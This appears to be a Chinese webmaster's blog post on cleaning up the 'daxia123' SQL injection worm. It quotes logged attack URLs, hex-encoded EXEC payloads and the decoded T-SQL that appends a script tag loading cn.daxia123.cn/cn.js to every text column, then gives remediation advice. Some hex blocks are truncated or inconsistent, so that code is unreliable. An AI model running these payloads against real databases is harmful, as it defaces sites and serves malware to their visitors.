«

»

2 月
24

<script src=http—cn.daxia123.cn.js>病毒的解決





無標題文件

網頁設計<script src=http://cn.daxia123.cn.js>病毒的解決方法

發佈者:作者:Web Design香港網頁設計大皇 – 網站設計

Web Design

  最近,有一種病毒通過SQL漏洞,直接往數據庫表裡注入<script src=http:// cn.daxia123.cn.js>,即使是現在,也還是有成千上萬的網站沒有得到解決吧?我的小站前幾天也和大家一樣,中毒了,而且幾天,幾個晚上都沒有休息好,經過努力,中國暫時恢復了正常,但還是不放心。我就簡單的說下我解決的過程吧。
首先,我們通過日誌,可以看到一段代碼,

  http://xxx.xxx.xxx/xxx.asp?xxx=xxx’ AnD (sElEcT ChAr(94)+cAsT(CoUnT(1) aS VaRcHaR(100))

+ChAr(94) fRoM [mAsTeR]..[sYsDaTaBaSeS])>0 AnD ”=’

第二次使用
http://xxx.xxx.xxx/xxx.asp?xxx=xxx%’ AnD (sElEcT ChAr(94)+cAsT(CoUnT(1) aS VaRcHaR(100))

+ChAr(94) fRoM [mAsTeR]..[sYsDaTaBaSeS])>0 And ‘%’=’

第三次使用
http://xxx.xxx.xxx/xxx.asp?xxx=xxx;dEcLaRe @S VaRcHaR(4000) SeT @s=cAsT

(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C4

15245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616

D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F4

37572736F72204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C40432

36E2F636E2E6A733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655F437

572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F4

3415445205461626C655F437572736F72 aS VaRcHaR(4000));eXeC(@s);–

第四次使用
[url=http://xxx.xxx.xxx/xxx.asp?xxx=xxx%]http://xxx.xxx.xxx/xxx.asp?xxx=xxx%'[/url] ;dEcLaRe

@S VaRcHaR(4000) SeT @s=cAsT

(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C4

15245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616

37572736F72204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C40432

572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F4

3415445205461626C655F437572736F72 aS VaRcHaR(4000));eXeC(@s);– aNd ‘%’=’

第五次使用
http://xxx.xxx.xxx/xxx.asp?xxx=xxx’;dEcLaRe @S VaRcHaR(4000) SeT @s=cAsT

(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C4

15245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616

92C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F636E2E64617869613132332E6

36E2F636E2E6A733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655F437

572736F7220494E544F24E4420434C4F5345205461626C655F437572736F72204445414C4C4F4

3415445205461626C655F437572736F72 aS VaRcHaR(4000));eXeC(@s);–

這些二進制編碼是:
DECLARE @T VARCHAR(255),@C VARCHAR(255)
DECLARE Table_Cursor CURSOR FOR
SELECT a.name,b.name FROM sysobjects a,syscolumns b
WHERE a.id=b.id AND a.xtype=’u’ AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0) BEGIN EXEC(‘UPDATE [‘+@T+’] SET [‘+@C+’]=RTRIM(CONVERT(VARCHAR

(4000),[‘+@C+’]))+”<script src=http://cn.daxia123.cn/cn.js></script>”’)
FETCH NEXT FROM Table_Cursor INTO @T,@C END
CLOSE Table_Cursor DEALLOCATE Table_Cursor

  此種方法的破壞程度非常嚴重!也就是,我們找到了原因,就是因為利用程序的漏洞,在參數頁面進行SQL注入,萬幸的是,這些二進制編碼,對ACCESS數據庫是無效果的,因為ACCESS數據庫沒有反編譯功能,所以很多網站避免了被攻擊。

  好了,沿歸正轉,我們找到了入侵的原理,那麼我們現在就得考試解決問題了,首先,我們因該把網站停了,把出問題的頁面(最好是一個一個檢查),就是帶參數的頁面,把非數字類型的字符做下判斷,這只是第一步,然後做好conn文件的防注入代碼。然後再恢復數據吧!

  如果是自己的服務器,請大家一定要認真的掃瞄好系統,因為連帶著前期進攻,可能會值入木馬到服務器裡,然後掠奪3389權限,把你的服務器當成肉機來攻擊你周圍的機器。

  好了,這裡提供一個SQL通用防注入系統3.0 供大家參考學習。希望大家的問題能及時得到解決,堅決和大家一起共度難關,最後,webdesign.zoapcon.comcom站長提前祝大家春節快樂!

Web Hosting